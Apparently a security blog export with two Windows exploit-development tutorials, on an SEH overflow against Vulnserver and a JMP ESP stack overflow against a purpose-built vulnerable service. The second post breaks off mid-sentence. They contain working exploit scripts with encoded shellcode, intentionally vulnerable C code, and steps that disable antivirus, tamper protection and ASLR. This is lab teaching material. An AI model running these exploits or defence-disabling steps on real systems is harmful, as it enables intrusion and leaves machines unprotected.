[{"content":"Lab Setup Three things need to be sorted on the Windows lab machine before any of this works cleanly.\nAntivirus off. Shellcode and exploit scripts will be flagged and quarantined before they ever run. Real-time protection, tamper protection, SmartScreen, all of it needs to go. Turn off tamper protection first, then real-time protection. If you do it the other way around, Defender re-enables itself.\nASLR disabled system-wide. Windows randomizes module base addresses by default, which means every time the program runs, the modules load at different addresses. For foundational exploit development you need those addresses to stay the same between runs so any gadget address you hardcode in a payload is still valid the next time. This registry key forces that:\nreg add \u0026#34;HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management\u0026#34; /v MoveImages /t REG_DWORD /d 0 /f Reboot after applying it.\nDEP disabled for the target binary. Data Execution Prevention marks stack memory as non-executable at the OS level. If it is enabled, the CPU will refuse to execute code sitting on the stack even if you redirect execution there perfectly. For this lab the binary gets compiled without NX compatibility so the stack stays executable. In real targets this protection gets bypassed with ROP chains rather than compiled away, but that comes later.\nWhat is Structured Exception Handling? Windows has a built-in mechanism for handling errors at runtime. When something goes wrong inside a running process, like a null pointer dereference, a divide by zero, or an access violation, Windows does not just kill the process immediately. 
It first gives the process a chance to deal with the exception through a system called Structured Exception Handling, or SEH.\nIn C code you interact with SEH through __try and __except blocks:\n__try { // code that might crash strcpy(buf, input); } __except(EXCEPTION_EXECUTE_HANDLER) { // this runs if something goes wrong printf(\u0026#34;exception caught\\n\u0026#34;); } Under the hood the compiler translates this into a data structure that gets pushed onto the stack. That structure is called an _EXCEPTION_REGISTRATION_RECORD and it has exactly two fields:\n0:003\u0026gt; dt ntdll!_EXCEPTION_REGISTRATION_RECORD +0x000 Next : Ptr32 _EXCEPTION_REGISTRATION_RECORD +0x004 Handler : Ptr32 _EXCEPTION_DISPOSITION Next is a pointer to the next record in the chain. Handler is the address of the function to call when an exception occurs. Each record is 8 bytes. Multiple records are linked together on the stack forming a singly linked list. The last record in the chain has 0xffffffff as its Next pointer, which signals the end of the chain. If Windows walks the entire chain without any handler dealing with the exception, it gives up and calls WerFault.\nThe head of the chain is always stored at FS:[0] in the Thread Environment Block. In WinDbg you can verify this directly:\ndd fs:[0] And the !exchain command walks and displays the entire chain in a readable format.\nWhy SEH Overflows Are Different From Standard Stack Overflows In a standard stack overflow the overflow needs to reach the saved return address. The function then has to complete its execution and run through the epilogue before ret fires and redirects execution. If the stack is corrupted badly enough that the epilogue fails, the exploit fails.\nSEH exploitation does not have this problem. The goal is to overflow past the saved return address and keep going until the overflow reaches an SEH record sitting further up the stack. 
Once that record is overwritten with controlled values, the exploit triggers an exception on purpose, typically the access violation caused by the overflow itself. Windows then walks the SEH chain, finds the overwritten record, and calls the Handler address. If that address points to useful code, execution has been hijacked without the function ever needing to return cleanly.\nThis makes SEH-based exploitation more reliable in situations where the stack is heavily corrupted.\nThe Vulnerable Code Vulnserver\u0026rsquo;s GMON command handler checks the length of the received input before calling the vulnerable function:\n} else if (strncmp(RecvBuf, \u0026#34;GMON \u0026#34;, 5) == 0) { char GmonStatus[13] = \u0026#34;GMON STARTED\\n\u0026#34;; for (i = 5; i \u0026lt; RecvBufLen; i++) { if ((char)RecvBuf[i] == \u0026#39;/\u0026#39;) { if (strlen(RecvBuf) \u0026gt; 3950) { Function3(RecvBuf); } break; } } The input only reaches Function3 if the received string is longer than 3950 bytes. This matters later when we build the payload. Any input of 3950 bytes or fewer is silently ignored.\nFunction3 is where the actual vulnerability lives:\nvoid Function3(char *Input) { char Buffer2S[2000]; strcpy(Buffer2S, Input); } strcpy copies the full input into a 2000-byte buffer with no length check. Pass it more than 2000 bytes and the copy overflows Buffer2S, walks up the stack past saved EBP, past the return address, and eventually reaches SEH records sitting further up the stack.\nCrashing the Service and Finding Offsets The first step is sending a long cyclic pattern to trigger the crash and overwrite the SEH chain with known pattern bytes.\nimport socket import pwn pattern = pwn.cyclic(5000) s = socket.socket() s.connect((\u0026#34;192.168.122.85\u0026#34;, 9999)) s.recv(1024) s.send(b\u0026#34;GMON /.:/\u0026#34; + pattern) s.close() Note the prefix GMON /.:/ in the command. The / character is what triggers the length check inside the GMON handler. 
Without it the vulnerable code path is never reached.\nWith vulnserver running under WinDbg, the crash looks like this:\n(1ea0.14d0): Access violation - code c0000005 (first chance) eax=7efefefe ebx=0000013c ecx=007c45c8 edx=7a6a6261 esi=00401848 edi=00f80000 eip=77aab649 esp=00f7f1d4 ebp=00f7f9c4 msvcrt!strcat+0x89: 77aab649 8917 mov dword ptr [edi],edx Running !exchain shows the overwritten SEH chain:\n0:003\u0026gt; !exchain 00f7ffcc: 6e6a6261 Invalid exception stack at 6d6a6261 Both fields of the SEH record contain cyclic pattern bytes. Using pwntools to find the offsets:\npwn cyclic -l 0x6e6a6261 # 3547 -\u0026gt; handler offset pwn cyclic -l 0x6d6a6261 # 3543 -\u0026gt; nSEH offset The nSEH field (Next) starts at offset 3543 from the beginning of the input. The Handler field starts at offset 3547, four bytes later.\nVerifying with marker values:\nnseh = struct.pack(\u0026#34;\u0026lt;I\u0026#34;, 0xbeefdead) handler = struct.pack(\u0026#34;\u0026lt;I\u0026#34;, 0xdeadbeef) payload = b\u0026#34;A\u0026#34; * 3543 payload += nseh payload += handler payload += b\u0026#34;A\u0026#34; * (3950 - len(payload)) Result:\n0:003\u0026gt; !exchain 00f5ffcc: deadbeef \u0026lt;- handler confirmed at offset 3547 Invalid exception stack at beefdead \u0026lt;- nSEH confirmed at offset 3543 Both offsets confirmed.\nHow Windows Calls the Handler Understanding exactly what happens when Windows calls the exception handler is critical for understanding why POP POP RET works.\nWhen an exception fires, Windows calls the registered Handler function like a standard cdecl call. Before jumping to it, Windows pushes four arguments onto the stack. 
The handler\u0026rsquo;s signature is:\nEXCEPTION_DISPOSITION handler( EXCEPTION_RECORD *ExceptionRecord, // [ESP+4] info about the exception void *EstablisherFrame, // [ESP+8] address of the SEH record CONTEXT *ContextRecord, // [ESP+12] full CPU state at crash time void *DispatcherContext // [ESP+16] internal dispatcher info ); At the moment the handler starts executing, the stack looks like this:\nHigh Address [ DispatcherContext ptr ] [ESP+16] [ ContextRecord ptr ] [ESP+12] [ EstablisherFrame ptr ] [ESP+8] \u0026lt;- points directly at the nSEH field [ ExceptionRecord ptr ] [ESP+4] [ return address ] [ESP] \u0026lt;- ESP points here Low Address The second argument, EstablisherFrame at [ESP+8], holds the address of the SEH record being dispatched. That is the address of the nSEH field, which is exactly where the jump to shellcode needs to be placed.\nYou can inspect the EXCEPTION_RECORD and CONTEXT structures directly in WinDbg:\n0:003\u0026gt; dt ntdll!_EXCEPTION_RECORD +0x000 ExceptionCode : Int4B +0x004 ExceptionFlags : Uint4B +0x008 ExceptionRecord : Ptr32 _EXCEPTION_RECORD +0x00c ExceptionAddress : Ptr32 Void +0x010 NumberParameters : Uint4B 0:003\u0026gt; dt ntdll!_CONTEXT +0x000 ContextFlags : Uint4B +0x09c Edi : Uint4B +0x0a0 Esi : Uint4B +0x0b8 Eip : Uint4B +0x0c4 Esp : Uint4B The CONTEXT structure contains a full snapshot of every CPU register at the moment the exception occurred. A legitimate handler would use this to inspect what went wrong and potentially resume execution. For exploitation purposes, none of it matters. The only thing that matters is EstablisherFrame at [ESP+8].\nPOP POP RET Explained A direct RET from the handler would pop whatever is at ESP into EIP. At that moment ESP points at the return address, which goes back into Windows exception dispatcher code. That is not useful.\nTwo POP instructions move ESP forward by 8 bytes total, skipping past the return address and the ExceptionRecord pointer. 
After two pops, ESP is pointing at EstablisherFrame. Then RET pops that value into EIP and the CPU jumps to the nSEH field.\nWalking through it step by step:\n; Starting state: ESP points at return address POP ECX ; read [ESP] into ECX (discarded), ESP moves to [ESP+4] POP ECX ; read [ESP] into ECX (discarded), ESP moves to [ESP+8] RET ; read [ESP] into EIP (EstablisherFrame = address of nSEH), jump there The register used for each POP does not matter at all. The values are thrown away. Any two-register combination works: POP ECX POP ECX, POP EBX POP EAX, POP EDI POP ESI. The only requirement is two POPs followed immediately by a RET.\nFinding a POP POP RET Gadget Not every module is safe to pull a gadget from. SafeSEH is a Windows protection that validates SEH handler addresses before calling them. If the handler address is not in the module\u0026rsquo;s SafeSEH table, Windows rejects it and the exploit fails.\nThe way to check a module for SafeSEH is by examining its PE header characteristics. essfunc.dll, the companion DLL that ships with vulnserver, has zero DLL characteristics:\n0:000\u0026gt; !dh 62500000 0 DLL characteristics 0 [0] address [size] of Load Configuration Directory Zero DLL characteristics means the NO_SEH flag (0x0400) is not set, so handlers inside the module are not rejected outright. No Load Configuration Directory means no SafeSEH table. Addresses from essfunc are valid for SEH handler overwrites.\nSearching essfunc for POP POP RET (opcodes 59 59 C3):\n0:000\u0026gt; s 0x62500000 L0x8000 59 59 c3 6250120b 59 59 c3 5d c3 55 89 e5... The length 0x8000 comes from the module size in lm output: 62508000 - 62500000 = 8000.\nVerifying the gadget:\n0:000\u0026gt; u 0x6250120b L3 essfunc!EssentialFunc9+0xb: 6250120b 59 pop ecx 6250120c 59 pop ecx 6250120d c3 ret Confirmed. The address 0x6250120b contains no null bytes (62 50 12 0b), so strcpy will not truncate the payload at this point.\nThe Island Hopping Problem With the offsets and gadget confirmed, nSEH needs to contain a jump that eventually reaches shellcode. 
The natural instinct is to put shellcode right after the handler field and use a short forward jump in nSEH. But there is a serious problem with that approach.\nThe SEH record at offset 3543 sits very close to the top of the thread\u0026rsquo;s stack. In the first crash above, the record is at 0x00f7ffcc and the faulting write is to 0x00f80000 (EDI), so only about 44 bytes of mapped memory remain after the 8-byte record. A 220-byte shellcode simply does not fit.\nThe shellcode needs to live in the filler area before the SEH record, where there are over 3500 bytes of available space. But nSEH is only 4 bytes, and a short jump (\\xeb) can only reach 127 bytes forward or 128 bytes backward. Shellcode at the start of the payload is thousands of bytes away.\nThe solution is a two-stage jump called island hopping:\nnSEH contains a short jump backward 128 bytes, landing in the filler area At the landing point, a near jump (\\xe9) with a 4-byte signed offset jumps all the way back to the NOP sled A near jump can reach plus or minus 2GB, far more than this payload needs.\nHere is the layout:\nOffset 0 : NOP sled (16 bytes) Offset 16 : Shellcode (220 bytes) Offset 236 : A filler Offset 3417 : Near jump (5 bytes, jumps back to offset 0) Offset 3422 : A filler Offset 3543 : nSEH = \\xeb\\x80\\x90\\x90 (short jump back 128 bytes to near jump) Offset 3547 : Handler = 0x6250120b (PPR gadget in essfunc.dll) Offset 3551 : A padding Total : 3950 bytes \\xeb\\x80 is the short jump. \\xeb is the opcode, \\x80 is the signed offset. In two\u0026rsquo;s complement, 0x80 is -128, meaning jump 128 bytes backward from the end of the instruction. 
The two \\x90 NOP bytes pad nSEH to the required 4 bytes.\nThe near jump offset calculation:\n# Near jump sits at offset 3417 # Target is offset 0 (start of NOP sled) # Offset = 0 - (3417 + 5) = -3422 # The +5 accounts for the 5-byte instruction itself near_jump = b\u0026#34;\\xe9\u0026#34; + struct.pack(\u0026#34;\u0026lt;i\u0026#34;, -3422) Execution Trace Full WinDbg trace of the exploit firing:\nPPR breakpoint hit:\nBreakpoint 0 hit eip=6250120b esp=010ce5d8 essfunc!EssentialFunc9+0xb: 6250120b 59 pop ecx First POP discards return address:\neip=6250120c esp=010ce5dc 6250120c 59 pop ecx Second POP discards ExceptionRecord pointer:\neip=6250120d esp=010ce5e0 6250120d c3 ret RET pops EstablisherFrame into EIP, landing on nSEH:\neip=010cffcc esp=010ce5e4 010cffcc eb80 jmp 010cff4e Short jump fires, lands on near jump in filler:\neip=010cff4e 010cff4e e9a2f2ffff jmp 010cf1f5 Near jump fires, lands in NOP sled:\neip=010cf1f5 010cf1f5 90 nop Memory at landing, NOP sled into shellcode:\n0:003\u0026gt; db eip L30 010cf1f5 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................ 010cf205 d9 cb bd 4a 6d 32 a0 d9-74 24 f4 5b 29 c9 b1 31 ...Jm2..t$.[)..1 010cf215 31 6b 18 83 eb fc 03 6b-5e 8f c7 5c b6 cd 28 9d 1k.....k^..\\..(. 16 NOPs followed immediately by the first bytes of the shikata_ga_nai encoded shellcode. 
The decoder runs, unpacks the payload, and calc.exe opens on the target.\nThe Full Exploit import socket import struct import sys TARGET_IP = \u0026#34;192.168.122.85\u0026#34; TARGET_PORT = 9999 def exploit(): print(f\u0026#34;[*] Target : {TARGET_IP}:{TARGET_PORT}\u0026#34;) print(f\u0026#34;[*] Gadget : PPR @ 0x6250120b (essfunc.dll, no SafeSEH)\u0026#34;) print(f\u0026#34;[*] Bad chars : \\\\x00\u0026#34;) print(f\u0026#34;[*] Encoder : x86/shikata_ga_nai\u0026#34;) print(f\u0026#34;[*] Payload : windows/exec CMD=calc.exe\u0026#34;) # msfvenom -p windows/exec CMD=calc.exe -b \u0026#34;\\x00\u0026#34; -f python buf = b\u0026#34;\u0026#34; buf += b\u0026#34;\\xd9\\xcb\\xbd\\x4a\\x6d\\x32\\xa0\\xd9\\x74\\x24\\xf4\\x5b\u0026#34; buf += b\u0026#34;\\x29\\xc9\\xb1\\x31\\x31\\x6b\\x18\\x83\\xeb\\xfc\\x03\\x6b\u0026#34; buf += b\u0026#34;\\x5e\\x8f\\xc7\\x5c\\xb6\\xcd\\x28\\x9d\\x46\\xb2\\xa1\\x78\u0026#34; buf += b\u0026#34;\\x77\\xf2\\xd6\\x09\\x27\\xc2\\x9d\\x5c\\xcb\\xa9\\xf0\\x74\u0026#34; buf += b\u0026#34;\\x58\\xdf\\xdc\\x7b\\xe9\\x6a\\x3b\\xb5\\xea\\xc7\\x7f\\xd4\u0026#34; buf += b\u0026#34;\\x68\\x1a\\xac\\x36\\x51\\xd5\\xa1\\x37\\x96\\x08\\x4b\\x65\u0026#34; buf += b\u0026#34;\\x4f\\x46\\xfe\\x9a\\xe4\\x12\\xc3\\x11\\xb6\\xb3\\x43\\xc5\u0026#34; buf += b\u0026#34;\\x0e\\xb5\\x62\\x58\\x05\\xec\\xa4\\x5a\\xca\\x84\\xec\\x44\u0026#34; buf += b\u0026#34;\\x0f\\xa0\\xa7\\xff\\xfb\\x5e\\x36\\xd6\\x32\\x9e\\x95\\x17\u0026#34; buf += b\u0026#34;\\xfb\\x6d\\xe7\\x50\\x3b\\x8e\\x92\\xa8\\x38\\x33\\xa5\\x6e\u0026#34; buf += b\u0026#34;\\x43\\xef\\x20\\x75\\xe3\\x64\\x92\\x51\\x12\\xa8\\x45\\x11\u0026#34; buf += b\u0026#34;\\x18\\x05\\x01\\x7d\\x3c\\x98\\xc6\\xf5\\x38\\x11\\xe9\\xd9\u0026#34; buf += b\u0026#34;\\xc9\\x61\\xce\\xfd\\x92\\x32\\x6f\\xa7\\x7e\\x94\\x90\\xb7\u0026#34; buf += b\u0026#34;\\x21\\x49\\x35\\xb3\\xcf\\x9e\\x44\\x9e\\x85\\x61\\xda\\xa4\u0026#34; buf += b\u0026#34;\\xeb\\x62\\xe4\\xa6\\x5b\\x0b\\xd5\\x2d\\x34\\x4c\\xea\\xe7\u0026#34; buf += 
b\u0026#34;\\x71\\x9f\\x71\\x97\\xed\\x48\\xdc\\x32\\x50\\x15\\xdf\\xe8\u0026#34; buf += b\u0026#34;\\x96\\x20\\x5c\\x19\\x66\\xd7\\x7c\\x68\\x63\\x93\\x3a\\x80\u0026#34; buf += b\u0026#34;\\x19\\x8c\\xae\\xa6\\x8e\\xad\\xfa\\xc4\\x51\\x3e\\x66\\x25\u0026#34; buf += b\u0026#34;\\xf4\\xc6\\x0d\\x39\u0026#34; ppr_gad = struct.pack(\u0026#34;\u0026lt;I\u0026#34;, 0x6250120b) # POP ECX POP ECX RET in essfunc.dll nseh = b\u0026#34;\\xeb\\x80\\x90\\x90\u0026#34; # short jump back 128 bytes + 2 NOPs near_jump = b\u0026#34;\\xe9\u0026#34; + struct.pack(\u0026#34;\u0026lt;i\u0026#34;, -3422) # near jump back to NOP sled payload = b\u0026#34;\\x90\u0026#34; * 16 # NOP sled at offset 0 payload += buf # shellcode at offset 16 payload += b\u0026#34;A\u0026#34; * (3417 - len(payload)) # filler up to near jump payload += near_jump # near jump at offset 3417 payload += b\u0026#34;A\u0026#34; * (3543 - len(payload)) # filler up to nSEH payload += nseh # nSEH at offset 3543 payload += ppr_gad # handler at offset 3547 payload += b\u0026#34;A\u0026#34; * (3950 - len(payload)) # padding to trigger vulnerable path print(f\u0026#34;[*] Payload : {len(payload)} bytes\u0026#34;) print(f\u0026#34;[*] Layout : [NOP x16][Shellcode][Filler][NearJump][Filler][nSEH][PPR][Pad]\u0026#34;) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_IP, TARGET_PORT)) print(f\u0026#34;[+] Connected\u0026#34;) s.recv(1024) s.send(b\u0026#34;GMON /.:/\u0026#34; + payload) print(f\u0026#34;[+] Payload sent\u0026#34;) s.close() print(f\u0026#34;[+] Done. Check target for calc.exe\u0026#34;) except ConnectionRefusedError: print(f\u0026#34;[-] Connection refused. 
Is the service running?\u0026#34;) sys.exit(1) except Exception as e: print(f\u0026#34;[-] Error: {e}\u0026#34;) sys.exit(1) if __name__ == \u0026#34;__main__\u0026#34;: exploit() Payload Layout Offset 0-15 : NOP sled (16 bytes) Offset 16-235 : shikata_ga_nai encoded shellcode (220 bytes) Offset 236-3416 : A filler Offset 3417-3421 : Near jump \\xe9 (5 bytes, jumps back to offset 0) Offset 3422-3542 : A filler Offset 3543-3546 : nSEH = \\xeb\\x80\\x90\\x90 (short jump back 128 bytes) Offset 3547-3550 : Handler = 0x6250120b (POP POP RET in essfunc.dll) Offset 3551-3949 : A padding to reach minimum trigger length Total : 3950 bytes Key Takeaways SEH exploitation does not need the function to return cleanly. The overflow itself triggers the exception. Even with a completely corrupted stack, Windows still dispatches the exception and calls the overwritten handler.\nPOP POP RET is a precise mechanism, not magic. The handler is called with four arguments pushed on the stack. Two POPs skip past the return address and ExceptionRecord pointer, leaving ESP pointing at EstablisherFrame, which holds the address of the SEH record. RET pops that into EIP and lands on nSEH.\nShort jumps only reach 127 bytes forward or 128 bytes backward. When shellcode is thousands of bytes away, island hopping solves it. Short jump to near jump, near jump to shellcode. The short hop is limited, but the near jump it lands on covers the rest of the distance.\nSafeSEH rejects handler addresses not listed in a module\u0026rsquo;s SafeSEH table. Always verify DLL characteristics and Load Configuration Directory before choosing a module as a gadget source. A module with zero DLL characteristics and no Load Configuration Directory is not SafeSEH protected.\nPayload size matters for triggering the vulnerable code path. The GMON handler only calls Function3 when the input exceeds 3950 bytes. Sending less does nothing. 
Always match payload length to what caused the original crash.\nThe shellcode cannot live after the SEH record. The record sits near the top of the stack, so there is almost no mapped memory left after offset 3551 before hitting a page boundary. Shellcode must live in the filler region before the SEH record and the jump chain must reach backward to it.\nThis exploit runs against a deliberately vulnerable lab binary compiled without modern mitigations. It is a learning exercise.\n","permalink":"https://4w4647.github.io/posts/seh-overflows-hijacking-windows-exception-handlers/","summary":"\u003ch2 id=\"lab-setup\"\u003eLab Setup\u003c/h2\u003e\n\u003cp\u003eThree things need to be sorted on the Windows lab machine before any of this works cleanly.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eAntivirus off.\u003c/strong\u003e Shellcode and exploit scripts will be flagged and quarantined before they ever run. Real-time protection, tamper protection, SmartScreen, all of it needs to go. Turn off tamper protection first, then real-time protection. If you do it the other way around, Defender re-enables itself.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eASLR disabled system-wide.\u003c/strong\u003e Windows randomizes module base addresses by default, which means every time the program runs, the modules load at different addresses. For foundational exploit development you need those addresses to stay the same between runs so any gadget address you hardcode in a payload is still valid the next time. This registry key forces that:\u003c/p\u003e","title":"SEH Overflows - Hijacking Windows Exception Handlers"},{"content":"Lab Setup Three things need to be sorted on the Windows lab machine before any of this works cleanly.\nAntivirus off. Shellcode and exploit scripts will be flagged and quarantined before they ever run. Real-time protection, tamper protection, SmartScreen, all of it needs to go. Turn off tamper protection first, then real-time protection. 
If you do it the other way around, Defender re-enables itself.\nASLR disabled system-wide. Windows randomizes module base addresses by default, which means every time the program runs, the modules load at different addresses. For foundational exploit development you need those addresses to stay the same between runs so any gadget address you hardcode in a payload is still valid the next time. This registry key forces that:\nreg add \u0026#34;HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management\u0026#34; /v MoveImages /t REG_DWORD /d 0 /f Reboot after applying it.\nDEP disabled for the target binary. Data Execution Prevention marks stack memory as non-executable at the OS level. If it is enabled, the CPU will refuse to execute code sitting on the stack even if you redirect execution there perfectly. For this lab the binary gets compiled without NX compatibility so the stack stays executable. In real targets this protection gets bypassed with ROP chains rather than compiled away, but that comes later.\nThe Vulnerable Service #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;string.h\u0026gt; #include \u0026lt;winsock2.h\u0026gt; void vulnerable(char *input) { char buf[64]; printf(\u0026#34;[*] Copying input into buf[64]...\\n\u0026#34;); strcpy(buf, input); printf(\u0026#34;[+] Done. 
You entered: %s\\n\u0026#34;, buf); } int main() { WSADATA wsa; SOCKET s, client; struct sockaddr_in server, addr; int addrlen = sizeof(addr); char input[1024]; WSAStartup(MAKEWORD(2, 2), \u0026amp;wsa); s = socket(AF_INET, SOCK_STREAM, 0); server.sin_family = AF_INET; server.sin_addr.s_addr = INADDR_ANY; server.sin_port = htons(4444); bind(s, (struct sockaddr *)\u0026amp;server, sizeof(server)); listen(s, 1); printf(\u0026#34;[*] Listening on port 4444...\\n\u0026#34;); client = accept(s, (struct sockaddr *)\u0026amp;addr, \u0026amp;addrlen); printf(\u0026#34;[+] Connection accepted\\n\u0026#34;); recv(client, input, sizeof(input), 0); printf(\u0026#34;[*] Received input, passing to vulnerable()\\n\u0026#34;); vulnerable(input); closesocket(client); WSACleanup(); return 0; } The vulnerability is in vulnerable(). The line strcpy(buf, input) copies whatever came in over the network into a 64-byte buffer with no length check whatsoever. strcpy keeps copying bytes until it hits a null byte in the source, regardless of how large the destination is. Send more than 64 bytes and it writes straight past the end of buf into whatever memory sits above it on the stack.\nWhat sits above it turns out to be the saved base pointer and then the return address. And that is where things get interesting.\nCompiled from Linux with protections stripped:\ni686-w64-mingw32-gcc -o vuln.exe vuln.c \\ -fno-stack-protector \\ -mpreferred-stack-boundary=2 \\ -lws2_32 \\ -Wl,--disable-nxcompat What each flag does:\n-fno-stack-protector disables stack canaries. These are values the compiler inserts between the buffer and the return address that get checked before the function returns. If they are corrupted, the process aborts before ret even executes. -mpreferred-stack-boundary=2 uses 4-byte stack alignment instead of 16-byte. Keeps the frame layout clean and predictable. -lws2_32 links the Windows Sockets library for the network code. 
-Wl,--disable-nxcompat tells the linker to mark the binary as not requiring DEP. Without this flag, DEP applies and the stack is non-executable. The Stack Frame Before calculating offsets there needs to be a clear picture of what the stack looks like when vulnerable() is running.\nWhen main() calls vulnerable(input), the cdecl calling convention applies. The caller pushes the argument (a 4-byte pointer to input) onto the stack, then executes CALL. The CALL instruction pushes the return address (the address of the next instruction in main) and jumps to vulnerable:\npush input_pointer ; 4-byte pointer to input buffer call vulnerable ; pushes return address, jumps to function Inside vulnerable(), the prologue sets up the stack frame:\npush ebp ; save caller\u0026#39;s base pointer mov ebp, esp ; anchor EBP to current stack top sub esp, 64 ; reserve 64 bytes for buf After the prologue finishes, the stack looks like this:\nHigh Address ┌──────────────────┐ │ input pointer │ [ebp+8] argument pushed by caller ├──────────────────┤ │ return address │ [ebp+4] pushed by CALL ├──────────────────┤ │ saved EBP │ [ebp] EBP register points here ├──────────────────┤ │ │ │ buf[64] │ 64 bytes of local buffer │ │ │ │ ESP points here └──────────────────┘ Low Address The stack grows downward toward lower addresses. buf sits below saved EBP in memory. When strcpy writes into buf, it starts at the bottom of the buffer and fills upward, heading straight toward saved EBP and then the return address.\nThe offset math is straightforward:\n64 bytes buf itself 4 bytes saved EBP above buf --------- 68 bytes total to reach the return address Bytes at offset 68 through 71 overwrite the return address. When the function\u0026rsquo;s epilogue runs and ret executes, it pops those 4 bytes into EIP. The CPU jumps to whatever address is there. 
Put a controlled address in those bytes and execution is hijacked.\nHow the Epilogue Still Works The overflow writes 0x41414141 over the saved EBP value on the stack. A reasonable question is whether this breaks the epilogue before ret even fires.\nThe epilogue for vulnerable() is:\nmov esp, ebp ; collapse local frame, reset ESP pop ebp ; restore saved EBP from stack into EBP register ret ; pop return address into EIP The key detail is that mov esp, ebp reads from the EBP register, not from the saved value on the stack. The EBP register was set during the prologue with mov ebp, esp and was never touched again during the function body. It still holds the correct address pointing at the saved EBP location on the stack.\nSo the epilogue runs correctly. mov esp, ebp resets ESP to the right place. pop ebp loads the corrupted 0x41414141 into the EBP register, which breaks the caller\u0026rsquo;s frame, but by this point execution is being taken over so it does not matter. Then ret pops the overwritten return address into EIP and the CPU jumps there.\nConfirming EIP Control Theory needs to be verified. A quick script confirms the offset:\nimport socket payload = b\u0026#34;A\u0026#34; * 68 + b\u0026#34;B\u0026#34; * 4 + b\u0026#34;C\u0026#34; * 100 s = socket.socket() s.connect((\u0026#34;192.168.122.85\u0026#34;, 4444)) s.send(payload) s.close() 68 As to fill buf and overwrite saved EBP. 4 Bs at offset 68 to land on the return address. 100 Cs as padding.\nWinDbg crash output:\n(15cc.229c): Access violation - code c0000005 (second chance) eax=00000066 ebx=019e0df8 ecx=00000000 edx=00df0000 esi=019e0e88 edi=00000059 eip=42424242 esp=0126f8c4 ebp=41414141 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 42424242 ?? ??? EIP is 42424242 which is BBBB. EBP is 41414141 which is AAAA. The offset is confirmed at 68 bytes.\nThere is something else worth noting in the crash output. 
ESP is sitting at 0126f8c4 and it is pointing directly at the Cs. After ret pops the return address into EIP, ESP advances by 4 bytes and lands on whatever came immediately after the return address in the payload. That is attacker-controlled data sitting right at ESP. This is the mechanism that makes JMP ESP useful.\nFinding a JMP ESP Gadget With EIP control confirmed, the next step is figuring out where to redirect execution. The goal is to execute shellcode, and the shellcode will be placed right after the overwritten return address in the payload. At the moment ret fires, ESP points directly at that shellcode.\nSo what is needed is an instruction somewhere in memory that says \u0026ldquo;jump to whatever ESP points at.\u0026rdquo; In x86, JMP ESP does exactly that. Its opcode is two bytes: FF E4.\nThe challenge is finding a copy of those two bytes at an address that is stable and predictable. If the address changes between runs, the hardcoded value in the payload becomes wrong and the exploit crashes. This is exactly why ASLR was disabled earlier.\nStep 1: Find out what modules are loaded.\nIn WinDbg, the lm command lists all loaded modules with their start and end addresses:\n0:000\u0026gt; lm start end module name 00400000 0043c000 vuln 75c80000 75d47000 msvcrt 75de0000 75ed0000 KERNEL32 77640000 7790a000 KERNELBASE 77950000 77b0f000 ntdll Each line shows the start address, end address, and name of a loaded module. These are the regions of memory available to search for a gadget.\nStep 2: Calculate the search range.\nTo search a module for FF E4, the s command in WinDbg needs a start address and a length. 
The length is calculated by subtracting the start address from the end address.\nFor msvcrt:\nend - start = length 75d47000 - 75c80000 = c7000 So the search length for msvcrt is 0xc7000 bytes, which covers the entire module.\nStep 3: Search for the opcode.\n0:000\u0026gt; s 0x75c80000 L0xc7000 ff e4 75d099fd ff e4 00 00 57 e8 39 ee-fb ff 83 c4 14 8b bd 34 The s command syntax is s \u0026lt;start\u0026gt; L\u0026lt;length\u0026gt; \u0026lt;bytes\u0026gt;. WinDbg found FF E4 at address 0x75d099fd inside msvcrt.dll.\nStep 4: Verify it is actually JMP ESP.\nFinding the bytes is not enough. They need to be disassembled to confirm they form a valid instruction at that address:\n0:000\u0026gt; u 0x75d099fd L1 msvcrt!_winput_s_l+0xa5d: 75d099fd ffe4 jmp esp Confirmed. 0x75d099fd contains JMP ESP.\nStep 5: Verify the address is stable.\nWith ASLR disabled system-wide, restarting the program should load msvcrt at the same base address. Running lm across multiple sessions confirmed msvcrt consistently loading at 0x75c80000, which means 0x75d099fd is reliable.\nOne more check: the address itself must not contain any null bytes, because strcpy stops copying at 0x00. Looking at 75 d0 99 fd, there are no null bytes. The gadget address is clean.\nLittle-Endian Packing x86 is little-endian. Multi-byte values are stored in memory with the least significant byte at the lowest address. The address 0x75d099fd does not go into the payload as-is. It gets stored reversed: fd 99 d0 75.\nPython handles this with struct.pack:\nimport struct jmp_esp = struct.pack(\u0026#34;\u0026lt;I\u0026#34;, 0x75d099fd) # produces: b\u0026#39;\\xfd\\x99\\xd0\\x75\u0026#39; The \u0026lt; means little-endian. I is an unsigned 32-bit integer. Getting the byte order wrong loads a garbage address into EIP and the exploit crashes with no obvious indication of the cause.\nBad Character Enumeration strcpy stops at 0x00. Any null byte anywhere in the payload truncates everything that follows it. 
Other byte values might also get corrupted depending on how the service processes input, and shellcode containing a corrupted byte will silently fail mid-execution.\nThe process for finding bad characters is to send every possible byte value through the vulnerability and compare what arrives on the stack against what was sent:\nimport socket bad_chars = bytes(range(1, 256)) payload = b\u0026#34;A\u0026#34; * 68 + b\u0026#34;B\u0026#34; * 4 + bad_chars s = socket.socket() s.connect((\u0026#34;192.168.122.85\u0026#34;, 4444)) s.send(payload) s.close() After the crash, db esp L100 in WinDbg shows the raw bytes that landed on the stack. Comparing byte by byte against the expected sequence 01 02 03 ... fd fe ff reveals any bytes that went missing or got changed.\nFor this target, every byte from 0x01 through 0xff arrived intact. The only bad character is:\n0x00 — null terminator, kills strcpy immediately Generating Shellcode With bad characters confirmed, msfvenom generates shellcode that avoids them:\nmsfvenom -p windows/exec CMD=calc.exe -b \u0026#34;\\x00\u0026#34; -f python Found 11 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 220 (iteration=0) Payload size: 220 bytes shikata_ga_nai is a polymorphic XOR encoder. It wraps the shellcode in a self-decoding stub. When the shellcode runs, the decoder executes first. It XORs each encoded byte back to its original value and then jumps into the decoded shellcode. The encoded form sitting in the payload never actually contains the bad characters. They exist only in the decoded form that 